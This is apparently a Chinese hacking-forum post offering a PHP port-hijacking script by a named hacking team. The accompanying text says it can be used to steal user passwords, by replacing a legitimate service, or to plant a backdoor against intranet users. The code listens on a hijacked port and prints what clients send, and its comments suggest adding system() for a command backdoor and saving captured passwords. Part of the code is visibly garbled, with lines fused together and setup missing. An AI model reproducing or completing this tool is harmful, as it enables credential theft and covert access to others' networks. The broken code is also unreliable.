PHP下实现端口复用/劫持
假如监听127.0.0.1 ,访问共网IP不受影响,假如监听公网IP,127。0。0。1等IP不受影响。这个可以用于欺骗用户密码,因为原来的服务不可用了。或者留成针对内网用户的后门。
最后欢迎加MSN:CQXY[AT]21CN。NET赐教。
#!/usr/bin/php -q
#c0dz by Darkness[BST]
#Team:[url]www.bugkidz.org[/url]
#E-mail:cqxy[at]21cn.net
if ($argc != 3 || in_array($argc[1] , array('--help','-h','?')))
{
echo "Use:#./$argv[0] [url]www.bugkidz.org[/url] 192.168.0.1 21\r\n";
echo "c0dz By Darkness[BST]";
exit;
}
error_reporting(E_ALL);
set_time_limit(0);
ob_implicit_flush();
$host = $argv[1];
$port = $argv[2];
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) =@socket_read($sniffer, 2048, PHP_BINARY_READ)) ==false)
{
break;
}
if (!$buf = trim($buf)) {
continue;
}
if ($buf == '!quit') {
break;
}
if ($buf == '!shutdown') {
socket_close($sniffer);
break 2; /*其实这里可以调用system(),搞成一个CMD后门,反正你想怎么改都可以*/
}
$sniff_data = "$buf\r\n";
/* else socket_write($sniffer, $sniff_data, strlen($sniff_data));*/
echo $sniff_data;
/*输出字符串,这里可以加进文件处理,保存密码什么的*/
}
socket_close($sniffer);
}
socket_close($resock);
socket_close($sock);
?>
页:
[1]